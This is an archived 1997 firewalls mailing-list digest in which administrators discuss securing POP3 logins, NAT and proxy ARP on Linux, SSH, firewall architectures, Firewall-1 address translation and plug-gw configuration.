Received: from chiba (syd2-ppp-131.tpgi.com.au [203.29.157.131]) by ren.globecomm.net (8.8.5/8.8.0) with SMTP id SAA19560 for ; Tue, 3 Jun 1997 18:09:53 -0400 (EDT)
Date: Tue, 3 Jun 1997 08:10:31 +1000 (EST)
From: Warpy
To: firewalls@GreatCircle.COM
Subject: Secure Pop3?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Following on in the same thread of my last question, I have seen that one of the best sources of clear-text logins and passwords is people accessing pop3 (while a sniffer is running, in this case "linsniff"). Is there a secure pop3 "getmail" program available, or a way I can implement existing secure transfer programs (such as ssh) with *nix based pop3 mail grabber programs?
Warpy

From owner-firewalls-outgoing Tue Jun 3 16:41:26 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA00115 for firewalls-outgoing; Tue, 3 Jun 1997 16:13:33 -0700 (PDT)
Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA00104 for ; Tue, 3 Jun 1997 16:13:26 -0700 (PDT)
Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZ2os-0004J0C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:16:50 +0200 (MET DST)
Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 4 Jun 97 01:16 MET DST
Received: by lina.inka.de id m0wZ2kO-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:12:12 +0200 (CEST)
Message-Id:
Date: Wed, 4 Jun 1997 01:12:10 +0200
From: Bernd Eckenfels
To: David Lang
Cc: firewalls@greatcircle.com
Subject: Re: NAT on linux firewall?
References: <199706031744.KAA06986@mail.diginsite.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.67
In-Reply-To: <199706031744.KAA06986@mail.diginsite.com>; from David Lang on Tue, Jun 03, 1997 at 09:45:44AM -0700
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

On Jun 3, David Lang wrote
> for each web site do the following:
> setup the alias
>
> ifconfig eth0:2 200.200.200.2

You don't need that alias device; it's enough (much better) to use proxy ARP with the following single command:

  arp -s 200.200.200.0 xx:xx:xx:xx:xx:xx netmask 255.255.255.0 pub

(with xx:xx:xx:xx:xx:xx being the ethernet address of your network card).

> setup an input firewall filter (I created a file rc.fw that I run after
> rc.inet1)

instead you can use a modified transproxy or netcat.. humm.. will look into this.
I think with iproute and 2.1 kernels you can do the same thing:

  iproute addrule to 200.200.200 nat 100.100.100

Greetings
Bernd

--
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O)       If privacy is outlawed only Outlaws have privacy

From owner-firewalls-outgoing Tue Jun 3 17:11:41 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA06126 for firewalls-outgoing; Tue, 3 Jun 1997 16:57:59 -0700 (PDT)
Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA05349 for ; Tue, 3 Jun 1997 16:50:36 -0700 (PDT)
Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZ3On-0004J0C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:53:57 +0200 (MET DST)
Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 4 Jun 97 01:53 MET DST
Received: by lina.inka.de id m0wZ3Jq-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:48:50 +0200 (CEST)
Message-Id:
Date: Wed, 4 Jun 1997 01:48:48 +0200
From: Bernd Eckenfels
To: David Lang , firewalls@greatcircle.com
Cc: Bernd Eckenfels
Subject: Re: NAT on linux firewall?
References: <199706032327.QAA07588@mail.diginsite.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.67
In-Reply-To: <199706032327.QAA07588@mail.diginsite.com>; from David Lang on Tue, Jun 03, 1997 at 03:28:13PM -0700
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

> where can I get info on iproute? is that something new in the 2.1 kernels?

Yes, 2.1.x (x>15) ships with linux/Documentation/networking/policy-routing.txt and routing.txt, which describe the new features briefly.
iproute can be obtained from any Debian GNU/Linux mirror (ftp.debian.org:/debian/bo/source/net) as iproute_961225-2.tar.gz. (Transproxy is there too, in transproxy_0.2.orig.tar.gz.)

I found another solution which does not need ipfwadm and plug-gw, but uses transproxy instead:

  arp -s 200.200.200.0 xx:xx:xx:xx:xx:xx netmask 255.255.255.0 pub
  route add -net 200.200.200.0 netmask 255.255.255.0 dev lo
  tproxyd -t -b 200.200.200.2 -s 80 -r nobody 100.100.100.2 80
  ...
  tproxyd -t -b 200.200.200.254 -s 80 -r nobody 100.100.100.254 80

BTW: you don't need to use 200 different IP addresses for the WWW servers. You can run multiple WWW servers on different ports:

  tproxyd -t -b 200.200.200.2 -s 80 -r nobody 100.100.100.2 80
  ...
  tproxyd -t -b 200.200.200.254 -s 80 -r nobody 100.100.100.2 334

Greetings
Bernd

PS: with a patch to transproxy, simple translation tables will allow you to run only one tproxyd server instance.

--
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O)       If privacy is outlawed only Outlaws have privacy

From owner-firewalls-outgoing Tue Jun 3 17:41:14 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA09189 for firewalls-outgoing; Tue, 3 Jun 1997 17:18:00 -0700 (PDT)
Received: from access2.digex.net (access2.digex.net [205.197.245.193]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA09168 for ; Tue, 3 Jun 1997 17:17:49 -0700 (PDT)
Received: from localhost (brads@localhost) by access2.digex.net (8.8.4/8.8.4) with SMTP id UAA26995; Tue, 3 Jun 1997 20:21:27 -0400 (EDT)
Date: Tue, 3 Jun 1997 20:21:26 -0400 (EDT)
From: Bradley Smith
To: Warpy
cc: firewalls@GreatCircle.COM
Subject: Re: Secure Pop3?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Try the APOP option..
Granted, it's not much, but it's better than cleartext. Alternatively, if you're into S&M you could kerberize it :-) Or, you could go to something like S/Key or SecurID.

-brad

On Tue, 3 Jun 1997, Warpy wrote:

> Following on in the same thread of my last question, I have seen that one
> of the best sources of clear text logins and passwords to be from people
> accessing pop3 (while a sniffer is running, in this case "linsniff"). Is
> there a secure pop3 "getmail" program available, or a way i can implement
> existing secure transfer programs (such as ssh) with *nix based pop3 mail
> grabber programs?
>
> Warpy
>
>

From owner-firewalls-outgoing Tue Jun 3 17:58:46 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA11488 for firewalls-outgoing; Tue, 3 Jun 1997 17:31:57 -0700 (PDT)
Received: from sge.net (krystal.sge.net [152.91.9.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA11459 for ; Tue, 3 Jun 1997 17:31:47 -0700 (PDT)
Received: by sge.net; id KAA10959; Wed, 4 Jun 1997 10:35:23 +1000 (EST)
Received: from zirconia.sge.net(10.1.1.6) by krystal.sge.net via smap (3.2) id xma010909; Wed, 4 Jun 97 10:35:00 +1000
Received: by zirconia.sge.net; id KAA24966; Wed, 4 Jun 1997 10:35:00 +1000 (EST)
Received: from ns2.dpie.gov.au(152.91.195.1) by zirconia.sge.net via smap (3.2) id xma024855; Wed, 4 Jun 97 10:34:31 +1000
Received: (from news@localhost) by conargo.dpie.gov.au id KAA20586 (8.6.11/IDA-1.6); Wed, 4 Jun 1997 10:34:30 +1000
X-Organisation: Department of Primary Industries and Energy
X-Url: http://www.dpie.gov.au/
X-Notice: Views expressed by this message are not necessarily those of the Department of Primary Industries and Energy or of the Government of the Commonwealth of Australia.
To: firewalls@greatcircle.com
Path: usenet
From: Gavin Longmuir
Newsgroups: maillist.comp.firewalls
Subject: Re: SSH Equiv for FTP?
Date: Wed, 04 Jun 1997 10:34:29 +1000
Organization: Commonwealth Department of Primary Industries and Energy http://www.dpie.gov.au/
Lines: 20
Message-ID: <3394B815.6EE1@dpie.gov.au>
References: <5n0mn6$74a@conargo.dpie.gov.au>
NNTP-Posting-Host: 152.91.194.1
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 3.01 (X11; I; SunOS 5.4 sun4m)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

ArkanoiD wrote:
>
> nuqneH,
>
> >
> > I was wondering whether there was an equivalent to SSH for ftp. Does
> > anyone know if there is?
> >
>
> You can use ftp over ssh with port forwarding feature..
>

Try rsync using ssh as the transport method. A technical paper can be found at http://cs.anu.edu.au/techreports/1996/TR-CS-96-05.html

Gavin

--
Gavin Longmuir - Internet Applications and Platforms Manager
Information Management and Services Branch
Commonwealth Department of Primary Industries and Energy
Voice:+61 6 271 6486 FAX:+61 6 272 4997 mailto:Gavin.Longmuir@dpie.gov.au

From owner-firewalls-outgoing Wed Jun 4 01:00:29 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA11070 for firewalls-outgoing; Wed, 4 Jun 1997 00:58:14 -0700 (PDT)
Received: from pdx.com.my (pdx.com.my [192.228.144.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA11046 for ; Wed, 4 Jun 1997 00:58:04 -0700 (PDT)
Received: from wsm.pdx.com.my by pdx.com.my with smtp (Smail3.1.29.1 #3) id m0wZAu3-000BGFC; Wed, 4 Jun 97 15:54 GMT+0800
Message-ID: <3395210C.7EAF@pdx.com.my>
Date: Wed, 04 Jun 1997 16:02:20 +0800
From: Wong
Organization: CSNet
X-Mailer: Mozilla 3.0Gold (Win95; I)
MIME-Version: 1.0
To: "Kohn, Joav" , Mariko Yashada
CC: firewalls@greatcircle.com
Subject: Re: ISP Connection
References: <0C673F68C3A0D011A94208002BE526253524@USBGREXCH01>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 2 June 1997, Kohn, Joav wrote:
>
> unless you have a screening router (or proxy server, or firewall) at
> your end, you have no security at all. just cause the direct route to
> your network is hidden doesn't give you any security. if it made it
> impossible for the internet to reach you, none of your internet requests
> would ever get back to you.
>
> no matter how you go, ISP or MCI/SPRINT/ATT, you still need to get some
> type of protection on your end, under your control. after all, would you
> want to bank your company on your internet provider?
>
>
> On 2 June 1997, Mariko Yashada wrote:
> >
> >
> > My company is currently getting Internet access through a local ISP, using
> > PPP connections. We are now considering replacing the dial-up connections
> > with a leased line to the ISP. We will leave our web server at the ISP and
> > will continue to use their e-mail server. There will be a router at the ISP
> > end of the line. The line will connect to our Enterprise Network through a
> > router at our end. We will also put a proxy server at our end to filter out
> > going access and do NAT.
> >
> > The ISP people say this type of connection is more secure than a direct
> > connection to the Internet through say MCI, because our router will be
> > "hidden" behind their routing system. The IP address of our router will not
> > be accessible from outside the ISP domain.
> >
> > We will not allow incoming connections such as telnet or ftp. We will
> > restrict access from inside the company to e-mail, http, ftp and probably
> > audio.
> >
> > My question is, how secure is this type of connection? How difficult is it
> > for someone outside the ISP domain to discover and access our connection?
> >
> > Thanks,
> >
> > Mariko
> >

Hi Pals!

I agree with what Kohn said in his first paragraph, last line. By the way Kohn, she mentioned that she will be using a proxy server in her first paragraph.

1. Your router is "hidden" because both your router and your ISP's router will not broadcast any routing tables between themselves. This is a normal configuration, since there are so many routers in the Internet, and surely your router cannot store them in its cache.

   a. You will define a static route (or a default gateway) with the address of your ISP's router and a metric of one in your router, and your ISP also will add a static route in their router to point to your router. Whenever your router receives any packet destined for 0.0.0.0, it will be forwarded to your ISP's router.

   b. You will disable "talk" and "listen" on your router. So your internal LAN will not be broadcast to the Internet, and your router will not receive any routing updates. This is why you would have to add a static route in your router.

2. A proxy server alone is not enough to protect your LAN. You will need more than that, for example a packet filter, an application filter or a full firewall.

3. Anyone can still know your LAN's network address, just by pinging your proxy server or DNS (e.g. ping grfn.org instead of the normal "ping x.x.x.x"). You can see the IP address in the reply packet (unless you install a firewall and disable the ICMP echo reply function).

Regards.
Wong.
From owner-firewalls-outgoing Wed Jun 4 01:45:28 1997
Message-Id: <01BC70CA.41A88880@pcpedro>
From: Pedro Salgueiro
To: "'Mike Jones'"
Cc: "'firewalls'"
Subject: RE: PIX and Firewall-1
Date: Wed, 4 Jun 1997 09:29:35 +0100

Hi to all,

I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some:

1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure => less secure). It may be very complicated establishing rules.

2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known constructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one.

3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols, i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols.

Regards,
Pedro Salgueiro

Data General Portugal
Tel. +351 - 1 - 4129600
Fax. +351 - 1 - 4129699
mailto:psalgueiro@pt.europe.dg.com
R. Dr. António Loureiro Borges nº2
Arquiparque - Miraflores
1495 Algés
Portugal
______________________________________________
"Don't take life too serious no one gets out alive!!!! :-)"
* These are my own opinions and do not reflect those of the company *

----------
From: Mike Jones
Sent: Wednesday, 4 June 1997 8:55
To: mfiocchi@otm.it; firewalls@GreatCircle.COM; carlsonp@sprynet.com
Subject: Re: PIX and Firewall-1

Peter Carlson writes....
> There are many comparisons made by datacomm, lan times, ziff-davis and
> others. Keep in mind that both pix and fw-1 are glorified packet filters,
> even though they have a fancy name for it. I would stick with an
> application level gateway. They are well accepted and known for being more
> secure.

Many things are known that aren't so. This claim comes by periodically in this forum, and I have yet to get an answer to this question: in what way are application level gateways more secure than, say, FW-1 or PIX? There are certainly capabilities that can be provided via application proxies that can't be provided by any filter-based technologies, but what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't?

--
Mike Jones
Sr. Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Wed Jun 4 02:00:15 1997
Message-ID: <43BED8177D10D011A69A0800092C15D7011BFA@haig.oplab.nmac.ericsson.se>
From: Robert Ståhlbrand
To: "'Amy (Cremer) Briggs'"
Cc: "'firewalls@greatcircle.com'"
Subject: RE: Solaris
Date: Wed, 4 Jun 1997 10:43:57 +0200

I had this problem too and it really is confusing that editing /etc/netmasks doesn't fix it. My way around this was to edit /etc/rc2.d/S72inetsvc with a line that reconfigures the interface like:

    ifconfig le0 112.140.0.0 netmask 255.255.0.0 broadcast 112.140.255.0 -trailers up

I know that this isn't a very cute way to solve the problem but I tried a lot and couldn't think of anything else than to reconfigure the network interface when I booted.

Robert Ståhlbrand
Network-, System-responsible NMAC and OPLAB domains.
Ericsson Telecom AB
Box 333, Flöjelbergsgatan 1C
43124 Mölndal
Phone number +46 31 7476162
Fax number +46 31 7473777
Email: robert.stahlbrand@nmac.ericsson.se

> -----Original Message-----
> From: Amy (Cremer) Briggs [SMTP:amyc@libofmich.lib.mi.us]
> Sent: 3 June 1997 23:17
> To: firewalls@GreatCircle.COM
> Subject: Solaris
>
> First of all if there is a better list to post this to please let me
> know. I've checked out Sun's web site and didn't find any mention of a
> Solaris listserv.
>
> Does anyone know how can you trick a Solaris box into
> treating a class C address as a class B. For example we want to use
> 2xx.xx.0.0 as a class B address. I've entered the class B subnetmask for
> this network in the /etc/netmasks file which is how I thought you could do it
> but it isn't working for me. It still thinks it's a class C address and won't
> route properly if I set up my routes using it as a class B address.
> Finding a way to make this work would save me hours of time because I
> have 5 full class B (Technically class C) networks to do this for and
> entering all the class C's within all 5 class B's would take me awhile as
> well as complicate my routing table.
>
> Thanks for any help or information you can give me.
>
> Amy
>
> Amy Briggs, Microcomputer Support Specialist
> Library of Michigan  amyc@libofmich.lib.mi.us
> ** Its not what you've got, its what you give--TESLA **

From owner-firewalls-outgoing Wed Jun 4 04:00:20 1997
Date: Wed, 4 Jun 1997 07:01:59 -0400 (EDT)
From: Todd Graham Lewis
To: Joe Klemmer
cc: firewalls@GreatCircle.COM
Subject: Re: ipfwadm question (and procmailrc test)

On Mon, 2 Jun 1997, Joe Klemmer wrote:
>
> I will be setting up a FW using RH Linux and ipfwadm (mainly
> because there's no funding to pay for a commercial product)

FWIW, we do have funding for a commercial product and we're using ipfwadm anyway.

> and I have one
> quick question. It's more related to the physical setup of the FW in
> that, if I'm not mistaken, I'd need to put the FW PC physically in front of
> all the nodes in the LAN, right? IOW, it should look like this:

(...)

Right. The key point is that you want a single choke point where you can actually _enforce_ your rules about what gets into and what leaves your network. If your firewall isn't the only point of entry for your network, then you can't guarantee this.

(It is possible to secure a network using firewalls without employing this sort of chokepoint model, but the complexities are much greater, as are the possibilities for fucking it up; non-chokepoint firewall setups can only approach chokepoint firewalls in security and, imo, never pass them).

Making the firewall a true chokepoint is a simplifying move which makes implementing your policy much, much easier. Just so you're clear on what a chokepoint means in this context, here's what the physical layout of the network looks like:

     ------------     ----------------------     ---------     ----------------------
    | Internet   |---| Ethernet connected   |---| Linux   |---| Internal, protected  |
    |            |---| to the Internet      |---| Box     |---| ethernet             |
     ------------     ----------------------     ---------     ----------------------

Notice that the only way the internal, protected ethernet can get data to the Internet is through your Linux firewall. Because of this, if you decide, e.g., that no TCP traffic on port 23 will get through your Linux box, then the internal network cannot exchange data over port 23 with the outside world, period. This is the foundation of a firewall.

> I know this is in the FW books (Cheswick's and Chapman's) but I haven't
> had time to go into them much. This is really more a sticking point in my
> brain, I guess. I need a better visualization of this whole thing.

Hopefully this was it. If you need more pointers, feel free to contact me in private email or ask the list.
--
Todd Graham Lewis
MindSpring Enterprises
tlewis@mindspring.com

From owner-firewalls-outgoing Wed Jun 4 04:30:11 1997
Message-ID: <33955741.5A7980ED@gestronic.ch>
Date: Wed, 04 Jun 1997 13:53:38 +0200
From: Raymond Sleiman
To: "fw-1-mailinglist@us.checkpoint.com", "firewalls@GreatCircle.COM"
Subject: Address Translation with Firewall 2.1 on Solaris 2.5.1

Hello,

I defined address translation on a firewall gateway as follows:

    193.246.62.140  193.246.62.140  DST_STATIC  195.176.150.10
    195.176.150.10  195.176.150.10  SRC_STATIC  193.246.62.140

I add with arp -s 195.176.150.10 ethernet_address of the machine 193.246.62.10 PUB.

I also defined static routes to 193.246.62.140 using the internal interface of the firewall:

    route add 195.176.150.10 Ipaddress of the internal interface 193.246.62.2

The internal interface has 193.246.62.2 as IP address. The external interface has 195.176.150.2 as IP address. This address is a registered address. The class 195.176.150.0 is a registered class; the class 193.246.62.0 is not a registered address. Addresses are samples and not reality.

The problem: I am not able to ping the translated address 195.176.150.10 from the internet, from the inside, or from the gateway itself. Could someone tell me what is wrong?

Another question: where should we define address translation? How to load the address translation table (xlate.conf)? Do we have to launch a command to load the address translation configuration? Are the static routes correct?

Best regards
Raymond Sleiman

From owner-firewalls-outgoing Wed Jun 4 05:22:11 1997
Date: Wed, 4 Jun 1997 08:09:15 -0400 (EDT)
From: Joe Klemmer
Reply-To: klemmerj@webtrek.com
cc: firewalls@GreatCircle.COM
Subject: Re: ipfwadm question (and procmailrc test)

On Wed, 4 Jun 1997, Todd Graham Lewis wrote:

> Hopefully this was it. If you need more pointers, feel free to contact me
> in private email or ask the list.

That was definitely "it". I figured this was how it should look but it's nice to get a clear picture of things. Now it's on to finding someone who has the slightest clue of the physical layout of the network.

---
"It's a damn poor mind that can only think of one way to spell a word."
-- Andrew Jackson

From owner-firewalls-outgoing Wed Jun 4 05:45:27 1997
Date: Wed, 4 Jun 1997 20:08:16 -0800
From: drexx@pspi.com.ph (Drexx Laggui)
Message-Id: <199706050408.UAA00805@sunphil>
To: Boonchai.p@cdg.co.th, fw-1-mailinglist@us.checkpoint.com, firewalls@greatcircle.com
Subject: Re: [FW1] FW-1 compare with Alta Vista Firewall

|> From: Boonchai Pattanatananon
|> Date: Tue, 3 Jun 1997 20:23:02 +-700
|>
|> Hello folks,
|>
|> Who has comparison of FW-1 3.x with Alta Vista Firewall.
|> Please send it to me.
|>

Hello Boonchai,

Try this: http://www.data.com/lab_tests/firewalls97.html

Ciao,
Drexx.

.: This e-mail is made from 100% recycled electrons :.
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
DEXTER D. LAGGUI
Systems Engineer, Systems Integration Group
PHILIPPINE SYSTEMS PRODUCTS INC.
Penthouse, Corporate Business Center
150 Paseo de Roxas Ave., Legaspi Village
Makati City, Philippines
Phone: (++ 63-2) 813-6453 to 55 loc. 222
Fax  : (++ 63-2) 813-3516
Email: drexx@pspi.com.ph
Pager: (++ 63-2) 1277-33615
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~

From owner-firewalls-outgoing Wed Jun 4 06:00:24 1997
Message-ID: <33959035.42BD@southconn.com>
Date: Wed, 04 Jun 1997 08:56:37 -0700
From: Gary Bryant
To: Firewalls@GreatCircle.COM
Subject: What is SSH ?
References: <199706040800.BAA11243@honor.greatcircle.com>

Forgive my ignorance but (I am new to this firewall stuff) what is SSH?

Gary Bryant

From owner-firewalls-outgoing Wed Jun 4 06:16:15 1997
From: John_Chen@ACML.COM
To: sleiman@gestronic.ch
cc: Fw-1-Mailinglist@Us.Checkpoint.Com, Firewalls@Greatcircle.Com
Message-ID: <852564AC.0049D14D.00@smtpmta.acml.com>
Date: Wed, 4 Jun 1997 09:29:09 -0400
Subject: Re: Address Translation with Firewall 2.1 on Solaris 2.5.1

John Chen @ ALLIANCE CAPITAL 06-04-97 09:29 AM

Be aware of the NAT for which interface or both; for your problem, defining the outside interface will be better.

sleiman @ gestronic.ch on 04/06/97 07:53:38
To: fw-1-mailinglist @ us.checkpoint.com, firewalls @ GreatCircle.COM
cc: (bcc: John Chen/New York/ACMC)
Subject: Address Translation with Firewall 2.1 on Solaris 2.5.1

Hello,

I defined address translation on a firewall gateway as follows:

    193.246.62.140  193.246.62.140  DST_STATIC  195.176.150.10
    195.176.150.10  195.176.150.10  SRC_STATIC  193.246.62.140

I add with arp -s 195.176.150.10 ethernet_address of the machine 193.246.62.10 PUB.

I also defined static routes to 193.246.62.140 using the internal interface of the firewall:

    route add 195.176.150.10 Ipaddress of the internal interface 193.246.62.2

The internal interface has 193.246.62.2 as IP address.
The external interface has 195.176.150.2 as IP address. This address is a registered address. The class 195.176.150.0 is a registered class; the class 193.246.62.0 is not a registered address. Addresses are samples and not reality.

The problem: I am not able to ping the translated address 195.176.150.10 from the internet, from the inside, or from the gateway itself. Could someone tell me what is wrong?

Another question: where should we define address translation? How to load the address translation table (xlate.conf)? Do we have to launch a command to load the address translation configuration? Are the static routes correct?

Best regards
Raymond Sleiman

From owner-firewalls-outgoing Wed Jun 4 07:42:58 1997
Message-ID: <33956691.57F6@pdx.com.my>
Date: Wed, 04 Jun 1997 20:58:57 +0800
From: Wong
Organization: CSNet
To: Daniel_Yamaguchi@iscci.com, Jan Guldentops, "Jeremy D. Zawodny"
CC: firewalls@greatcircle.com
Subject: Re: Microsoft Proxy Server
References: <882564A1.00018A6A.00@isc_domino.iscci.com>

On 23 May 1997, Daniel_Yamaguchi@iscci.com wrote:
>
> All About MickySoft Proxy Server
>
> Security (...???)
>
> Microsoft's Proxy Server was subjected to extensive security testing and
> evaluation from independent testing agency, Coopers & Lybrand's Information
> Technology Security Services and is resistant to common attacks such as "IP
> Spoofing", 'SATAN", and "ISS."
>

C & L is an accounting and consulting firm (correct me if I'm wrong). What do they know about TCP/IP ports, filters (packet-level, application-level), encryption etc? They might talk about this and that, but do they know how to configure a proxy server or a firewall?

> Manageability & Ease of Use
>
> Integrated with NT User Directory Services, Microsoft Proxy Server allows:
>

Directory Service? Are you sure? Using NOVELL NDS or BANYAN Streetalk? Or LDAP?

> Easy Administration provided by a clean, easy to understand and easy to
> administer interface.
>

How do you administer multiple servers? And they are spread nation-wide? Unless you are running NetWare 4.x or Banyan.

> Remote Administration via Internet Service Manager allows Microsoft Proxy
> Server to be managed from any Windows NT system on the network.
>

I thought only NetWare have a utility called "rconsole"?

> Web Proxy
>
> Multi-Platform Support - The Web Proxy Server supports all platforms
> including:
> Windows NT Server
> Windows NT Workstation
> Windows '95
> Windows for Workgroups/Win 3.1
> UNIX
> Macintosh

Does IE run on Macintosh or UNIX? NETSCAPE Navigator can.

> Network Compatibility
>
> One of the best features of Microsoft Proxy Server is the use of WinSock
> Proxy to seamlessly provide a gateway between an administrator's existing
> IPX network infrastructure and IP-based network services.
>

At the moment, only NOVELL IntranetWare and CISCO IPeXchange have such a feature.

> Integrates with NT network security domain model - Microsoft Proxy Server
> extensively leverages the network-based Windows NT domain security model to
> manage access permission and logging.
>

You must use "Trust" to connect those domains together. And, the "Trust" can be compromised to make the NT trust anybody. Sounds scary . . . .!

> Massive Scalability - Microsoft Proxy Server's cache is limited only by
> Windows NY Server system resources.
>

Can NT scale up to 64 processors, like the SUN servers? Or 12 processors, like the Alpha servers?

Well guys, this is normal MickySoft marketing hype.

On 24 May 1997, Jan wrote:
>Let's put the record straight: if you are running MS-machines you'll need a
>complete firewall to shield it all off. Or you can believe all the
>marketing hype and leave your network completely open....

I agree with what you said.

>At 01:39 AM 5/24/97 -0400, Todd Graham Lewis wrote:
>>On Fri, 23 May 1997 Daniel_Yamaguchi@iscci.com wrote:
>>
>>> We, at ISC Computers & Communications, Inc. feel that this solution will
>>> meet your current needs regarding Internet Security.
>>
>>I, at 1025 Greenwood Avenue Apartment 3 in Atlanta, do not.
>Great... *Why not?*

You can scroll up to know why, Jeremy.

Regards.
Wong

From owner-firewalls-outgoing Wed Jun 4 07:52:03 1997
Message-ID: <33956E4A.6590018C@pvt.net>
Date: Wed, 04 Jun 1997 15:31:54 +0200
From: Petr Snajdr
To: Gary Bryant
CC: Firewalls@GreatCircle.COM
Subject: Re: What is SSH ?
References: <199706040800.BAA11243@honor.greatcircle.com> <33959035.42BD@southconn.com>

Gary Bryant wrote:
>
> Forgive my ignorance but (I am new to this firewall stuff) what is SSH?
>
> Gary Bryant

Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels.

See: http://www.cs.hut.fi/ssh/

--
Petr Snajdr

From owner-firewalls-outgoing Wed Jun 4 07:56:43 1997
Message-ID: <19970604104101.02710@capmark.funb.com>
Date: Wed, 4 Jun 1997 10:41:01 -0400
From: "Mark Horn [ Net Ops ]"
To: mjr@clark.net
Cc: Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
References: <199706030631.XAA11683@honor.greatcircle.com> <199706031349.JAA17464@mail.clark.net>
In-Reply-To: <199706031349.JAA17464@mail.clark.net>; from Marcus J. Ranum on Tue, Jun 03, 1997 at 09:47:53AM +0000

Marcus J. Ranum says:
>The one to many support requires kernel modifications
>in order to work. Basically, you need code that absorbs
>all packets going through the firewall, and the pulls the
>"real" destination out of the routing layer and connects
>to it. So, unless you want to spend a month or so on
>writing some pretty subtle kernel hacks, you can't do it
>with just FWTK.

That's not entirely true. I've made some modifications to plug-gw that exploit a feature of some operating systems. That feature is that you can assign many IP addresses to a single ethernet interface. I don't know how many OS's support this, but I know SunOS doesn't and Solaris does.

So, let's say that you have the following:

    client A               server C
                firewall
    client B               server D

You want both clients to be able to plug to either server. To accomplish this, assign two addresses to the firewall on the client side and two addresses to the firewall on the server side so that you have:

    client A    W       Y    server C
                 firewall
    client B    X       Z    server D

Where A, B, C, D, W, X, Y, and Z are all ip addresses. On the client side W represents C and X represents D. On the server side, Y represents A, and Z represents B. So, if client A wants to talk to server D, it connects to ip address W on the firewall.

The plug-gw has to have two modifications to allow this to work. First, it needs to recognize which ip address it was called as (e.g. W or X). Second, it needs to be able to specify a source IP address from which the plugged connection will originate. These are both extremely easy modifications, and I'm not a programmer. So, if you'd like this functionality, I'm sure that you can manage to modify it for yourself (*).

Using my modified plug-gw, the config for the above example would be (assume that the TCP port the servers are listening on is P):

    plug-gw: ip W port P A -plug-to C -srcip Y
    plug-gw: ip X port P A -plug-to D -srcip Y
    plug-gw: ip W port P B -plug-to C -srcip Z
    plug-gw: ip X port P B -plug-to D -srcip Z

Thus if client A wanted to talk to server C on port P, it would connect to IP address W port P. If it wanted server D port P, it would connect to IP address X port P. Etc.

The more generalized syntax is:

    plug-gw: ip <clientIP> port <listenPort> <allowedhosts> \
        -plug-to <destIP> [ -port <destport> ] [ -srcip <fwallIP> ] [ -privport ]

Where
  clientIP     is the IP address on the firewall that is being connected to by the client (e.g. w, x, y, or z)
  listenPort   is the port on the firewall that is being connected to by the client
  allowedhosts is the ip address of the client that is allowed to connect
  destIP       is the destination ip to plug this connection to
  destport     is the destination port to plug this connection to
